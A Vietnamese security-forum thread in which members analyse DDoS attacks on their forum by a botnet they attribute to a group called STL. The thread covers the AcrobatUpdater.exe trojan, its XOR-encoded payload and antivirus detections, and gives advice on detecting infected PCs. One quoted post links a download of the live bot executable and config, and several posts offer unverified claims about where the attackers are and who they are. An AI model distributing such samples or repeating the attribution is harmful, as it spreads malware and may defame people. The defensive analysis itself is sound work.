Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Sao lại là "Thái Nguyên", vị trí địa lý này nằm ở khu vực thông tin nào vậy mr conmale. Thông này có lẽ nằm ở Thông tin zombie,thông tin server, thông tin whois,thông tin người bị lộ diện ...?

Phân tích tính chất vài trận DDoS HVA vừa qua.

dexxa — GMT

Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên.

Ở Thái nguyên có bác Hoàng Hiệp "ghê gúm" lắm mà :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

tmd wrote:

Sao lại là "Thái Nguyên", vị trí địa lý này nằm ở khu vực thông tin nào vậy mr conmale. Thông này có lẽ nằm ở Thông tin zombie,thông tin server, thông tin whois,thông tin người bị lộ diện ...?

Từ tất cả các nguồn có thể tổng hợp được chớ không riêng một nguồn nào hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

http://www.ddth.com/showthread.php/365466-bui-hoang-hiep-lua-dao.html <<< Hoàng Hiệp này à?

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

conmale wrote:

TQN wrote:

Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)
Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à.

Sao lại là Thái Nguyên nhỡ :-O em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl @TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

xnohat wrote:

conmale wrote:

TQN wrote:

Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)
Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à.
Sao lại là Thái Nguyên nhỡ :-O em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl @TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x

Vậy mới gọi là lý thú em :). Khu vực nghèo không có nghĩa là không đủ khả năng tài chính. Một khía cạnh cần chú ý là trojan của stl có thể lấy đến ID của HHD, CPU... thì chuyện thẻ tín dụng của nạn nhân được chi dụng không phải là chuyện không thể xảy ra.

Phân tích tính chất vài trận DDoS HVA vừa qua.

dunggttn — GMT

Sao lại là Thái Nguyên nhỡ em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl

Tỉnh nghèo nhất phía Bắc ??? Nên xem lại quê mình đi :| ...

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Tin tốt không thấy mà toàn thấy tin xấu: http://au.ibtimes.com/articles/227838/20111010/china-and-vietnam-agree-over-internet-control.htm Nói chung là 2 bên đã hợp tác với nhau rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

love.exe — GMT

ủa sao cái tên namkaka giống của em dậy đây là tên của mấy nick em hay dặt trên mạng mà ta. không ngờ tên mình còn có người khác nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

canh_nguyen — GMT

TN đến giờ vẫn khá xôm tụ trong trò ăn Xê Xê mà!

Phân tích tính chất vài trận DDoS HVA vừa qua.

McSteven — GMT

Giớ mới biết bác TQN là đồng hương. Vietnamnet thì em vẫn vào bình thường không sao cả mà.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

xnohat wrote:

@TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x

Vụ này thì em không dám nhận à nhe, tha cho em. Dân Gialai em chỉ có bầu Đức, Quốc Cường Gialai thì nổi tiếng về KD thôi, chứ về kỹ thuật thì em không biết ! Dân Gialai em được cái uống cafe nguyên chất, thơm, ngon, không pha lạt như nước đường như ở nơi khác thôi, phải không đồng hương McSteven ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

xnohat wrote:

@TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x
Vụ này thì em không dám nhận à nhe, tha cho em. Dân Gialai em chỉ có bầu Đức, Quốc Cường Gialai thì nổi tiếng về KD thôi, chứ về kỹ thuật thì em không biết ! Dân Gialai em được cái uống cafe nguyên chất, thơm, ngon, không pha lạt như nước đường như ở nơi khác thôi, phải không đồng hương McSteven ;)

Ngoài cà phê ra thì còn có "em Pleiku, má đỏ môi hồng, ở đây buổi chiều quanh năm mùa đông... " nữa, he he. Lên Pleiku có một lần cách đây gần 30 năm nhưng vẫn còn nhớ rõ thị trấn bé nhỏ hiền hoà và những con người cực kỳ dễ thương. Tối hôm qua server nhánh bên Đức bị sự cố. Tụi data center thấy nó bị "offline" nên tự động restart lại nhưng vì lý do gì đó, firewall không start. Sáng nay chui vô thì thấy... mèn đét quơi.... DDoS thẳng vô / tá lả bùng binh luôn. Toàn là IP của Việt Nam. Kiểu này phải "sống chung với lũ" lâu dài rồi đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Em vào thì toàn trả về là null ping 100% lost. Có điều là khi em vào bằng Chrome không được thì khi bật Wireshark lên thì thì có 2, 3 kết nối đến 2 IP khác nhau của HVA trong khoảng 1 phút rồi nghỉ hẳn. Em đã đổi tên file Wireshark Portable thành RUN. Không biết khi tắt chương trình thì win nó có kết nối đến hay không? Hay do virus nhận biết có Wireshark?

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

learningandlearning, để phát hiện virus của stl, khi chạy Wireshark, bồ phải tắt trình duyệt đi để bớt thông tin nhiễu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

McSteven — GMT

Nói về cafe thì uống 1 cốc nhỏ là đủ thức trắng đêm! Không nhiều đá như trong Sài Gòn này. Như anh Conmale nói thì HVA vẫn còn DDOS sao? Em tưởng hết rối chứ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Xr0.9999 — GMT

McSteven wrote:

Nói về cafe thì uống 1 cốc nhỏ là đủ thức trắng đêm! Không nhiều đá như trong Sài Gòn này. Như anh Conmale nói thì HVA vẫn còn DDOS sao? Em tưởng hết rối chứ.

hiện tại vẫn còn, nhưng bị firewall block hết,theo em nghĩ đó là những bot tàn dư còn sót lại mặc định Ddos HVA mà chưa được diệt, chứ có thằng nào rảnh hơi rảnh thời gian ngồi ddos mà không thu được kết quả gì.

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Chính phủ Đức dùng trojan "do thám" http://www.quantrimang.com.vn/tintuc/tin-quoc-te/83379_Chinh-phu-Duc-dung-trojan-do-tham.aspx

Phân tích tính chất vài trận DDoS HVA vừa qua.

fptbinhduong — GMT

sao chủ đề không tiếp tục vậy???? buồn vậy không có gì để đọc hết, đã 10 ngày trôi qua....

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

fptbinhduong wrote:

sao chủ đề không tiếp tục vậy???? buồn vậy không có gì để đọc hết, đã 10 ngày trôi qua....

Không nên chỉ đọc không rồi ngồi chờ người khác viết để đọc tiếp mà hãy hành động, một ví dụ thiết thực mà mọi người có thể làm là phổ biến, nâng cao ý thức cảnh giác bảo mật và các kĩ năng sử dụng máy tính an toàn cho cộng đồng :) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity — GMT

e mới nghe được tin 3 website lớn của vn bị cướp domain : vozfroum.com và điaiem.com và website"đen" lauxanh.us ........ http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/45921/hai-website-lon-tai-viet-nam-bi-mat-ten-mien.html

Phân tích tính chất vài trận DDoS HVA vừa qua.

xuanphongdocco — GMT

Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

xuanphongdocco wrote:

Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ?

Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

xuanphongdocco — GMT

conmale wrote:

xuanphongdocco wrote:

Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ?
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) .

KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

xuanphongdocco wrote:

conmale wrote:

xuanphongdocco wrote:

Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ?
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) .
KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không?

Cái gì mà "trúng kế và lên tiếng" gì đây? Có thắc mắc thì cứ việc mà hỏi chớ việc gì phải "trúng kế" hay "trật kế" cho phiền vậy? Dạng malware / zombies này dùng low level sockets để connect tới nạn nhân bị DDoS. Nếu bồ dùng squid thì squid phải là transparent proxy và phải có cơ chế force requests đi đến cổng 80 bắt buộc phải đi xuyên qua squid thì mới có thể dựa vào log của squid mà kiểm tra.

Phân tích tính chất vài trận DDoS HVA vừa qua.

shuichi_akai — GMT

Em thắc mắc không biết có công cụ nào để giám sát traffic hiệu quả trong trường hợp lượng truy cập lớn? Vài trăm máy tính mà mỗi máy mở 1 trang không thôi thì lượng connections đã khá nhiều rồi, giả sử có bị botnet thì khả năng đọc log chắc cũng ngang ... tốc độ ánh sáng. Hay là anh có mẹo gì nữa ạ? :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

xuanphongdocco — GMT

conmale wrote:

xuanphongdocco wrote:

conmale wrote:

xuanphongdocco wrote:

Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ?
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) .
KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không?
Cái gì mà "trúng kế và lên tiếng" gì đây? Có thắc mắc thì cứ việc mà hỏi chớ việc gì phải "trúng kế" hay "trật kế" cho phiền vậy? Dạng malware / zombies này dùng low level sockets để connect tới nạn nhân bị DDoS. Nếu bồ dùng squid thì squid phải là transparent proxy và phải có cơ chế force requests đi đến cổng 80 bắt buộc phải đi xuyên qua squid thì mới có thể dựa vào log của squid mà kiểm tra.

Đúng vậy đó vấn đề chua nhất là chiên xào làm sao với cái đống log mà nó ghi lại dc, coi bằng tay thì ko nỗi rùi. Phải có con agent nào đó chạy như service đọc tự động. Mỗi ngày mình vào check những link lạ vừa truy cập thì dễ thở hơn. Công việc hằng ngày có việc này việc nọ nên không thể take care nó full time dc.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

shuichi_akai wrote:

Em thắc mắc không biết có công cụ nào để giám sát traffic hiệu quả trong trường hợp lượng truy cập lớn? Vài trăm máy tính mà mỗi máy mở 1 trang không thôi thì lượng connections đã khá nhiều rồi, giả sử có bị botnet thì khả năng đọc log chắc cũng ngang ... tốc độ ánh sáng. Hay là anh có mẹo gì nữa ạ? :D

Có mẹo gì đâu. Phân tích logs thì chỉ có Perl, không thì một mới cat, sed, awk, grep, sort, uniq là đủ. Làm admin thì mấy cái này là cơ bản mà em. Ai lại ngồi đó đọc log từng dòng? ;).

Phân tích tính chất vài trận DDoS HVA vừa qua.

ngocsangit — GMT

Lâu lắm rồi mới vô HVA, hôm qua đi nhậu với mấy thằng bạn GL của mình nghe tụi nó bàn về vụ lauxanh.us bị hack domain gì đó^^ thế là hôm nay đọc được bài này. Tinh thần của các A,E HVA thật đáng nể. STL nay trở thành "Sắp Tàn Lụi" thì đúng hơn. :D Thật vui khi biết có mấy A E GiaLai trong này. :) Chúc tất cả A E HVA giàu sức khoẻ để theo đuối tiếp đam mê.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Trong vài tuần qua, tớ thỉnh thoảng có nhận vài offline messages trên YIM (từ một số nick ảo) cũng như một số email nặc danh (email không tồn tại) hầu hết đề cập đến chủ đề "Phân tích tính chất vài trận DDoS HVA vừa qua" và hàm chứa nội dung bào chữa cho những việc làm của STL (là vì "bảo vệ sự ổn định của đất nước"). Tớ hơi buồn cười nhưng không rảnh để phản hồi các messages kia (mà có phản hồi cũng không được vì tất cả đều đi từ nguồn ảo). Hôm nay rảnh, tớ đăng vài dòng phản hồi để mấy anh em "ảo" kia hiểu rõ hơn tính nguỵ biện trong ý kiến mà các anh em đưa ra: 1. "Bảo vệ sự ổn định của đất nước" bằng cách đầu tư không biết bao nhiêu là thời gian và tiền bạc để làm những chuyện không những phi pháp và còn sai trái với lương tâm và đạo đức con người là việc không hữu lý. Những việc làm ấy không những không bảo vệ đất nước mà còn hoàn toàn đi ngược lại tinh thần bảo vệ. Nói một cách khác, khẩu hiệu "bảo vệ đất nước" bị lạm dụng một cách thảm thương. 2. "Bảo vệ sự ổn định của đất nước" bằng cách tấn công từ chối dịch vụ vào những trang như vietnamnet (cơ quan ngôn luận chính thức của nhà nước) và HVA (một diễn đàn kỹ thuật vô vụ lợi) e quá phi lý bởi vì sự ổn định của đất nước không nằm ở vietnamnet hoặc ở HVA. Các anh em còn cho rằng việc HVA phân tích mớ malware, trace ra nguồn DDoS và cảnh báo mọi người là một cách "trả đũa" thì các anh em lầm to. Nếu HVA thật sự muốn trả đũa thì các phân tích kỹ thuật đã không được trưng ra một cách công khai và minh bạch ngay từ đầu mà mọi thứ đã hoàn toàn im ắng cho đến khi "trọn ổ" được "bạch hoá" (ngôn ngữ của các bạn STL :P ). Những việc làm của HVA là vì cộng đồng và vì sự trong sạch và sự thật. Các anh em cũng đã từng rất tâm đắc với câu "muốn không ai biết mình làm gì thì đừng làm" và câu này cũng không phải là ngoại lệ đối với các anh em. Các anh em cũng nên biết rằng, có một thứ trên đời này không thể thay đổi được đó là: sự thật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vikjava — GMT

conmale wrote:

Các anh em cũng đã từng rất tâm đắc với câu "muốn không ai biết mình làm gì thì đừng làm" và câu này cũng không phải là ngoại lệ đối với các anh em. Các anh em cũng nên biết rằng, có một thứ trên đời này không thể thay đổi được đó là: sự thật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

WANWULIN — GMT

Vậy thực ra bọn đó là tay sai của tàu khựa ak

Phân tích tính chất vài trận DDoS HVA vừa qua.

tdtv-bkt432 — GMT

TQN wrote:

File xv.jpg chỉ vỏn vẹn dòng text này: Code:
2011-07-20 16:28:52
Ê, đệ tử, xem trong file xv.jpg nè, tao ra lệnh mày đúng hay quá giờ đó là stop tấn công với các chỉ dẩn từ xc.jpg nghe chưa. Dạ thưa sếp STL, em nghe lệnh. Thằng chủ nhân cái máy này nó không biết đâu, nó là zoombies của "Sống chết theo lệnh" tụi mình mà, he he !!!??? File Exe bot + config của nó em post ở đây: http://www.mediafire.com/?c57bbuc7iwq3ca4 Trong file này còn có file Decode.exe và source Decode.cpp để decode nội dung file xc.jpg ra file .xml để bà con xem. File IDA 61 database chứa thông tin disassembly của con AcrobatUpdater.exe, file images01.gif là chính là file AcrobatUpdater.exe với toàn bộ nội dung đã bị xor với 0x19.

Nghe code có vẻ như là thời gian ddos hay là hẹn giờ để ddos hay sao ấy?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tqcuong — GMT

texudo wrote:

http://www.threatexpert.com/report.aspx?md5=d517e448e15f3ea3b0405b7679eccfd7 Mình thấy trên Threatexpert rồi, không biết KIS submit hay là TQN or Conmale submit. Btw, với việc đưa lên đây thì các trình AV sẽ update nhanh thôi, tốt hơn nhiều so với việc viết cái tool remove nó. Giá mà BKAV update nhanh thì tốt, vì BKAV rất phổ biến ở các Computers của nhà nước (một số lượng khá lớn). =)) ------------------------------------------------------------------------------ Bạn AVIRA sẽ đưa cái này vào bản update tiếp theo (chắc ngày mai) - Avira ở VN dùng hơi nhiều: AcrobatUpdater.exe MALWARE The file 'AcrobatUpdater.exe' has been determined to be 'MALWARE'.Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.

[url=http://www.upanh.com/upanh_acrobatupdater.exe/v/drp25hal7ss.htm]

[/url]

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới bây giờ mà vẫn còn ra cái AcrobatUpdater.exe à, cắm đầu luôn. Heo mi !